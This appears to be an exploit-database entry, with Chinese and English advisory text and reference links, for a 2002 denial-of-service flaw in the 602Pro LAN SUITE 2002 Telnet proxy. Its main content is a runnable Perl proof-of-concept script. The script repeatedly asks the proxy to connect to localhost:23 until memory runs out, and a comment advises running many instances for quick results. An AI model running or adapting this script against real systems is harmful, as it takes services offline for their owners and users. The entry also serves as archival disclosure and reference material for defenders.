https://www.exploit-db.com/exploits/21694
https://www.securityfocus.com/bid/89523
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-778

602ProLANSUITE2002版本中的Telnet代理不能限制本地主机的未完成的连接数，远程攻击者可以通过大量的连接导致服务拒绝（内存消耗）。

source: http://www.securityfocus.com/bid/5416/info

The 602Pro LAN SUITE 2002 Telnet Proxy is reported to be prone to a denial of service condition. It is possible for proxy users to use the loopback interface to connect to localhost. If a large number of these connections are made concurrently, it is possible to cause a denial of service via resource exhaustion.

#!/usr/bin/perl

#

# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS

#

# Note: Try very high number of connections and run multiple instances

# of the script for quick results.

#

# Date: August 3, 2002

# Author: Stan Bubrouski ([email protected])



if (!$ARGV[2]) {

        print "Usage $0 <hostname> <port> <connections>nn";

        exit();

}


$host = $ARGV[0];

$port = $ARGV[1];

$numc = $ARGV[2];



use Net::Telnet ();

$t = new Net::Telnet;

$t->open(Host => $host,Port => $port);

foreach(1...$numc) {

        $t->waitfor('/.*host.*/');

        $t->print('localhost:23');

}

Software602 602Pro Lan Suite 2002

来源:XF
名称:602pro-telnet-proxy-dos(9768)
链接:http://www.iss.net/security_center/static/9768.php
来源:BUGTRAQ
名称:20020804Advisory:Multiple602ProLANSUITE2002DenialofServiceAttacks
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0518.html